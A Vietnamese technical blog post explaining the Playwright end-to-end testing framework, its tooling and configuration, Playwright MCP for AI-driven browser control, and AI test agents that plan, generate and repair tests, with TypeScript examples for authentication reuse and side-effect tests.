<h2 id="1-playwright-l-g-">1. Playwright là gì?</h2><figure class="kg-card kg-image-card"></figure><p>Playwright là framework E2E testing mã nguồn mở do Microsoft phát triển (2020), bởi team từng xây dựng Puppeteer.</p><p>Nó tích hợp sẵn:</p><ul><li>test runner</li><li>assertions</li><li>test isolation</li><li>parallel execution</li><li>debugging tools</li></ul><p>→ tất cả trong một package duy nhất</p><p>Hỗ trợ:</p><ul><li>Chromium, Firefox, WebKit</li><li>Windows, Linux, macOS</li><li>Headless / headed</li><li>Mobile emulation</li></ul><p>Khác với Selenium (WebDriver), Playwright: → giao tiếp trực tiếp với browser qua DevTools Protocol → nhanh hơn và ổn định hơn</p><h2 id="2-core-capabilities">2. Core capabilities</h2><h3 id="auto-wait-lo-i-b-flaky-test-">Auto-wait (loại bỏ flaky test)</h3><p>Playwright tự động chờ element:</p><ul><li>visible</li><li>stable</li><li>enabled</li></ul><pre><code class="language-typescript">await page.getByRole('button', { name: 'Submit' }).click();
</code></pre><p>Không cần:</p><ul><li><code>sleep()</code></li><li><code>waitForSelector()</code></li></ul><p>Assertions cũng auto-retry:</p><pre><code class="language-typescript">await expect(page).toHaveURL('/dashboard');
</code></pre><h3 id="test-isolation">Test Isolation</h3><p>Mỗi test chạy trong một BrowserContext riêng:</p><ul><li>không share cookies</li><li>không share localStorage</li><li>không share session</li></ul><p>→ tương đương incognito → chạy song song không xung đột</p><h3 id="web-first-assertions">Web-first Assertions</h3><p>Assertions sẽ: → tự wait cho đến khi condition đúng</p><pre><code class="language-typescript">await expect(locator).toBeVisible();
</code></pre><p>→ giảm flaky test đáng kể</p><h3 id="locator-u-ti-n-accessibility-">Locator (ưu tiên accessibility)</h3><pre><code class="language-typescript">page.getByRole('button', { name: 'Login' })
</code></pre><p>thay vì:</p><pre><code class="language-typescript">page.locator('.btn-primary')
</code></pre><p>→ test resilient hơn khi UI thay đổi</p><h3 id="cross-browser">Cross-browser</h3><pre><code class="language-typescript">projects: [
  { name: 'chromium' },
  { name: 'firefox' },
  { name: 'webkit' }
]
</code></pre><p>→ viết 1 lần, chạy nhiều browser</p><h2 id="3-dev-experience-tooling">3. Dev experience & tooling</h2><h3 id="trace-viewer">Trace Viewer</h3><pre><code class="language-bash">npx playwright show-trace trace.zip
</code></pre><ul><li>timeline toàn bộ test</li><li>DOM snapshot</li><li>network / console log</li></ul><p>→ debug deterministic</p><h3 id="ui-mode">UI Mode</h3><pre><code class="language-bash">npx playwright test --ui
</code></pre><ul><li>watch mode</li><li>time-travel debugging</li><li>pick locator trực tiếp</li></ul><h3 id="codegen">Codegen</h3><pre><code class="language-bash">npx playwright codegen https://your-app.com
</code></pre><p>→ generate test từ thao tác thật</p><h3 id="html-report">HTML Report</h3><pre><code class="language-bash">npx playwright show-report
</code></pre><h3 id="screenshots-video">Screenshots & Video</h3><pre><code class="language-typescript">use: {
  screenshot: 'only-on-failure',
  video: 'retain-on-failure'
}
</code></pre><h2 id="4-advanced-features">4. Advanced features</h2><h3 id="network-interception">Network Interception</h3><pre><code class="language-typescript">await page.route('**/api/**', route => {
  route.fulfill({ body: JSON.stringify({ mock: true }) });
});
</code></pre><h3 id="api-testing">API Testing</h3><pre><code class="language-typescript">const res = await request.get('/api/users');
</code></pre><h3 id="multi-tab-multi-window">Multi-tab / Multi-window</h3><pre><code class="language-typescript">const [newPage] = await Promise.all([
  context.waitForEvent('page'),
  page.click('a[target=_blank]')
]);
</code></pre><h3 id="parallel-sharding">Parallel & Sharding</h3><pre><code class="language-bash">npx playwright test --shard=1/3
</code></pre><h3 id="fixtures">Fixtures</h3><pre><code class="language-typescript">test('example', async ({ page, authUser }) => {
  // custom fixture
});
</code></pre><h3 id="authentication-reuse">Authentication reuse</h3><pre><code class="language-typescript">await context.storageState({ path: 'auth.json' });
</code></pre><h2 id="5-u-nh-c-i-m">5. Ưu & nhược điểm</h2><h3 id="-u-i-m">Ưu điểm</h3><ul><li>Nhanh, ổn định (DevTools Protocol)</li><li>Built-in đầy đủ</li><li>Parallel native</li><li>Debug mạnh (trace viewer)</li></ul><h3 id="nh-c-i-m">Nhược điểm</h3><ul><li>Ecosystem chưa lớn bằng Selenium</li><li>Cần làm quen locator mới</li></ul><h2 id="6-playwright-mcp-ai-i-u-khi-n-browser">6. Playwright MCP — AI điều khiển browser</h2><p>Playwright MCP server cho phép LLM (AI) tương tác với web thông qua Model Context Protocol.</p><p>Cách hoạt động:</p><ul><li>AI không nhìn screenshot hay pixel</li><li>AI đọc <strong>accessibility snapshot</strong> — cấu trúc text mô tả toàn bộ UI</li></ul><p>Ví dụ, AI nhìn thấy trang web như thế này:</p><pre><code>- heading "todos" [level=1]
- textbox "What needs to be done?" [ref=e5]
- listitem:
  - checkbox "Toggle Todo" [ref=e10]
  - text: "Buy groceries"
</code></pre><p>Mỗi element có một <code>ref</code> (reference ID). AI dùng ref để tương tác:</p><ul><li><code>ref=e5</code> → type text vào textbox</li><li><code>ref=e10</code> → check checkbox</li></ul><p>→ không cần vision model, không đoán tọa độ → nhanh, chính xác, hoạt động với mọi MCP client (VS Code, Cursor, Kiro...)</p><h2 id="7-playwright-test-agents-ai-t-vi-t-test">7. Playwright Test Agents — AI tự viết test</h2><figure class="kg-card kg-image-card"></figure><p>Playwright Test Agents đưa AI vào toàn bộ lifecycle của testing.</p><p>Bao gồm 3 agents:</p><ul><li><strong>Planner</strong> — khám phá app, sinh test plan</li><li><strong>Generator</strong> — viết code test từ plan</li><li><strong>Healer</strong> — tự sửa test khi fail</li></ul><p>Flow:</p><pre><code>seed → planner → generator → healer
</code></pre><h3 id="seed-file">Seed file</h3><p>Bạn chỉ cần viết 1 test cơ bản — đưa AI vào đúng trang cần test:</p><pre><code class="language-typescript">test('seed', async ({ page }) => {
  await page.goto('/');
  // login nếu cần
  // verify đã vào được app
});
</code></pre><p>Planner sẽ chạy seed này để "bước vào" ứng dụng, rồi từ đó khám phá tiếp.</p><h3 id="planner-t-o-test-plan">Planner — tạo test plan</h3><p>Planner mở browser, đi qua từng trang, đọc menu, form, button, table... rồi sinh ra file markdown mô tả các test scenarios:</p><pre><code class="language-markdown">## 1. Add Valid Todo
**Steps:**
1. Click "What needs to be done?" input
2. Type "Buy groceries"
3. Press Enter

**Expected:**
- Todo xuất hiện trong list
- Counter shows "1 item left"
</code></pre><p>Bạn review plan này, thêm edge cases nếu cần, rồi chuyển cho generator.</p><h3 id="generator-vi-t-code-test">Generator — viết code test</h3><p>Generator đọc plan, mở browser thật, thực hiện từng step, verify selector trực tiếp trên UI, rồi sinh code <code>.spec.ts</code>:</p><pre><code class="language-typescript">test('Add Valid Todo', async ({ page }) => {
  const input = page.getByRole('textbox', { name: 'What needs to be done?' });
  await input.fill('Buy groceries');
  await input.press('Enter');
  await expect(page.getByText('Buy groceries')).toBeVisible();
  await expect(page.getByText('1 item left')).toBeVisible();
});
</code></pre><h3 id="healer-self-healing-test">Healer — self-healing test</h3><p>Khi test fail (UI đổi, selector cũ, timing issue...), healer tự:</p><ol><li>replay failing step</li><li>inspect UI hiện tại</li><li>tìm element tương đương</li><li>patch code (update locator, thêm wait...)</li><li>chạy lại</li></ol><p>Nếu feature thực sự bị lỗi (không phải do test sai): → healer skip test thay vì sửa vô nghĩa</p><h2 id="8-authentication-trong-th-c-t-">8. Authentication trong thực tế</h2><p>Khi app cần đăng nhập, test cần login trước khi chạy. Playwright có 2 cách tùy theo mode:</p><h3 id="cli-mode-npx-playwright-test-">CLI mode (<code>npx playwright test</code>)</h3><p>Login 1 lần, lưu session ra file, các test sau dùng lại — không cần login lại:</p><pre><code class="language-typescript">// auth.setup.ts — chạy 1 lần trước tất cả test
setup('login', async ({ page }) => {
  await page.goto('/login');
  await page.getByLabel('Username').fill('test');
  await page.getByLabel('Password').fill('test');
  await page.getByRole('button', { name: 'Login' }).click();

  // Lưu cookies + localStorage ra file
  await page.context().storageState({ path: 'playwright/.auth/user.json' });
});
</code></pre><p>Config để các test tự load session đã lưu:</p><pre><code class="language-typescript">projects: [
  { name: 'setup', testMatch: /.*\.setup\.ts/ },
  {
    name: 'chromium',
    use: { storageState: 'playwright/.auth/user.json' },
    dependencies: ['setup'],
  },
]
</code></pre><h3 id="mcp-mode-ai-agents-ch-y-test-n-l-">MCP mode (AI agents chạy test đơn lẻ)</h3><p>Khi agents chạy test qua MCP, không có project config → không có session file. Dùng custom fixture để tự detect và auto-login:</p><pre><code class="language-typescript">export const test = base.extend({
  page: async ({ page }, use) => {
    const originalGoto = page.goto.bind(page);
    page.goto = async (url, options) => {
      const res = await originalGoto(url, options);
      if (page.url().includes('/login')) {
        await page.getByLabel('Username').fill('test');
        await page.getByLabel('Password').fill('test');
        await page.getByRole('button', { name: 'Login' }).click();
        await page.waitForLoadState('domcontentloaded');
      }
      return res;
    };
    await use(page);
  },
});
</code></pre><p>→ CLI mode: login 1 lần, reuse session → MCP mode: tự login khi cần</p><h2 id="9-test-c-side-effect-ch-y-l-i-v-n-pass">9. Test có side-effect — chạy lại vẫn pass</h2><p>Một số test thực hiện hành động thay đổi dữ liệu thật:</p><ul><li>hủy đơn hàng</li><li>xóa tài khoản</li><li>cancel điểm</li></ul><p>Vấn đề: lần đầu chạy thì pass, nhưng lần 2 dữ liệu đã bị thay đổi → test fail.</p><p>Cách xử lý: kiểm tra trạng thái dữ liệu trước khi thực hiện.</p><pre><code class="language-typescript">test('cancel order', async ({ page }) => {
  await page.goto('/orders');

  // Tìm đơn hàng chưa cancel
  const cancelBtn = page.getByRole('button', { name: 'Cancel' });

  if (await cancelBtn.count() === 0) {
    // Không còn đơn nào để cancel → skip thay vì fail
    test.skip(true, 'No orders available to cancel');
    return;
  }

  // Có đơn → thực hiện cancel
  await cancelBtn.first().click();
  await expect(page.getByText('Cancelled')).toBeVisible();
});
</code></pre><p>→ lần 1: cancel thành công → lần 2: detect không còn data → skip → test luôn green, chạy bao nhiêu lần cũng được</p><h2 id="10-k-t-lu-n">10. Kết luận</h2><p>Playwright là E2E testing framework hiện đại:</p><ul><li>nhanh</li><li>ổn định</li><li>đa trình duyệt</li></ul><p>Playwright MCP mở ra hướng: → AI điều khiển browser một cách deterministic</p><p>Playwright Test Agents đưa testing lên một level mới: → AI tự viết test → AI tự debug → AI tự sửa lỗi</p><p>Workflow mới:</p><pre><code>seed → AI generate → AI fix
</code></pre><p>Với các hệ thống lớn hoặc cần scale automation, Playwright + Test Agents gần như là lựa chọn mặc định hiện tại.</p>
</article>
</main></body></html>
GMO-Z.com Vietnam Lab Center Technology Blog

Remotion – Khi React trở thành công cụ tạo video

Remotion là gì?

Khác biệt lớn nhất: Video cũng chỉ là React Component